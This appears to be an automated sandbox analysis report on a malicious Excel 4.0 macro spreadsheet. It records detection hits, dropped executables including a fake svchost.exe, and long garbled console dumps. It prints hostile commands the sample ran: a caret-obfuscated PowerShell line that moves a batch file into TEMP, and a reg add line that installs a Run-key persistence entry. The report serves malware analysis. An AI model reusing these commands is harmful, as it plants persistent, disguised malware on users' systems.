Source: Document image extraction number: 1	Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
Source: Document image extraction number: 1	Screenshot OCR: Enable Content from the yellow bar above

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Initial sample: EXEC

Found obfuscated Excel 4.0 Macro

Show sources

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Initial sample: High usage of CHAR() function: 21

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\ps.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1DF6 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1DC5 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F31D66 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F31D30 NtQuerySystemInformation,

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A0F79
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A2840
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A2832
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A25F0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A57CC
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0040C090
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0041A390
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00414C70
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00410C10
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00411270
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_004136C0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00417A93
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C0F79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C2834
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C2840
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C25F0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C57CC
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_00400F87
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_00402840
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_00402832
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_004025F0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_004057CC

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

OLE indicator, VBA macros: true

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: String function: 0042AFA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: String function: 0040FCB0 appears 97 times

Source: ps.exe.23.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GvthaHtVzpRh.exe.24.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.27.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: unknown

Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\Documents\pd.bat, type: DROPPED	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research

Source: ps.exe.23.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: GvthaHtVzpRh.exe.24.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: svchost.exe.27.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@60/23@4/3

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1C7A AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1C43 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F31806 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F317CF AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_006B1806 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_006B17CF AdjustTokenPrivileges,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\D4FE0000

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mtx_pthr_locked_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListMax_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-rwl_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_static_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_sch_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idList_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListCnt_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_once_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_obj_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_dest_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\lCYThKzk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-global_lock_spinlock
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListNextId_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mxattr_recursive_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_max_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-cond_locked_shmem_rwlock
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_lock_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-pthr_root_shmem

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREC70.tmp

Jump to behavior

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

OLE indicator, Workbook stream: true

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#.................;...............;.......6.....`I8........v.....................K?.............l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j.....J................T.............}..v....(K......0...............H.b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....8O......0.................b.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j.....O................T.............}..v....pP......0...............H.b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v.....T...... .................b.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j....8U................T.............}..v.....U......0...............H.b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G...............>/.j......b...............T.............}..v....H\......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G..................j.....]................T.............}..v.....]......0...............H.b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S...............>/.j......b...............T.............}..v.....b......0.......................^.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S..................j....`c................T.............}..v.....c......0...............H.b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._...............>/.j......b...............T.............}..v.....i......0.......................Z.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._..................j.....i................T.............}..v....8j......0...............H.b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k...............>/.j......b...............T.............}..v.....q......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k..................j.....q................T.............}..v....8r......0...............H.b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v.....u......0.................b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w..................j.....v................T.............}..v.....w......0...............H.b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ .......>/.j......b...............T.............}..v.....z......0.................b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X{................T.............}..v.....{......0...............H.b.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#.................;...............;.......6.....`I8........v.....................K?.............r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................#.j.....n................T.............}..v....8o......0.................d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....Hs......0...............8.d.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../................#.j.....t................T.............}..v.....t......0.................d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v.....x......0...............8.d.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;................#.j....Hy................T.............}..v.....y......0.................d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G................<.j......d...............T.............}..v.....~......0.......................`.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G................#.j......................T.............}..v....(.......0.................d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S................<.j......d...............T.............}..v....P.......0.......................^.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S................#.j......................T.............}..v............0.................d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._................<.j......d...............T.............}..v............0.......................`.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._................#.j....h.................T.............}..v............0.................d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k................<.j......d...............T.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k................#.j....h.................T.............}..v............0.................d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v............0...............8.d.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w................#.j......................T.............}..v....0.......0.................d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ........<.j......d...............T.............}..v............0...............8.d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................#.j....x.................T.............}..v............0.................d.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................@{>.....................J^>.......................B...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............m.o.d.e........./.........................$......$.J............/.................$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .1.8.,.1. .............................*Y>.....m.o.d.e..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................*Y>.....m.o.d.e..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................@{>.....................J^>.......................B...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............c.o.l.o.r......./.........................$......$.J............/.................$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .F.E. .................................*Y>.....c.o.l.o..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................*Y>.....c.o.l.o..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................J^>.......................B...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.e.t.l.o.c.a.l./.........................$......$.J............/.................$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................*Y>.....s.e.t.l..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h..................................J....................J^>.....`{.J..............B...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............f.o.r...........`{.J....................*Y>.....X%.J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ./.F...........`{.J....................*Y>.....X%.J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .%.i. .i.n. ...=.4.-.5.................*Y>.....X%.J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............(.'.v.e.r.'.). .d.o. .5.................*Y>.....X%.J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.e.t...........d.o. .5.................*Y>.....X%.J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .V.E.R.S.I.O.N.=.%.i...%.j. ............Y>.....s.e.t............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h................................DB.....................*Y>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................p.C......................S>..............iB.......................$..............iB.............
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.e.t............\C.......................B...............C........J....x.........$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .V.E.R.S.I.O.N.=.6...1. ................^>.....s.e.t....iB.....................h.$..............iB.............
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................=.6...1..................^>.....s.e.t....iB.....................h.$..............iB.............
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................`{.J....................J^>......$.J..............B...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............".6...1.". .=.=. .".1.0...0.". ..........Y>.....i.f. ............DB...............$..... .......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............(................DB..................... .......................d1......h..v......$........................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................Y>.....(................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............e.c.h.o.........}..v............................p.......T.......................8.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........DB...............$.....0.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... ..........DB......................X>......................DB.............8.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............r.e.g...........}..v............................p.......f.........................$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................X>.....r.e.g............DB.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>......................................_>......................DB.............x.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. .................................._>......................DB.............x.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................ZX>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............t.i.m.e.o.u.t...}..v............................................................x.$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>......................................_>..... ./.t. ..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. .................................._>..... ./.t. ..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................._>......................DB.............x.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............s.c.h.t.a.s.k.s.}..v............................p.................................$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................p.......................................................J_>.....s.c.h.t..........DB.....................v.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>.....................................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. .................................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................._>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>......................................^>..... ./.t. ..........DB.............X.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............r.e.g...........d1......................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................^>.....r.e.g............DB.....................T.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................Y>........J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............). ......................................Y>........J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p................................DB.....................*Y>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............".6...1.". .=.=. .".6...3.". ............Y>.....i.f. ............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............(................DB.............................................d1......h..v......$........................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............e.c.h.o.........}..v............................p.......6.......................8.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........DB...............$.....2.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... ..........DB......................X>......................DB.............8.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............r.e.g...........}..v............................h.......I.........................$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................X>.....r.e.g............DB.............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>......................................_>......................DB.............x.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. .................................._>......................DB.............x.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................ZX>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............t.i.m.e.o.u.t...}..v....................................p.......................x.$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>......................................_>..... ./.t. ..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. .................................._>..... ./.t. ..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................._>......................DB.............x.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.................................$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................J_>.....s.c.h.t..........DB.....................v.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>.....................................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. .................................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................._>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>......................................^>..... ./.t. ..........DB.............X.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............r.e.g...........d1......................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................^>.....r.e.g............DB.....................T.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................Y>........J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............). ......................................Y>........J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h................................DB.....................*Y>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............".6...1.". .=.=. .".6...2.". ............Y>.....i.f. ............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............(................DB.............................................d1......h..v......$........................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................Y>.....(................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............e.c.h.o.........}..v............................h...............................8.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... ..........DB......................X>......................DB.............8.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............r.e.g...........}..v............................h.................................$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............t.i.m.e.o.u.t...}..v....................................N.......................x.$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.......t.........................$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>.....................................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................n.u.l. .................................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... .........d1......................._>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................
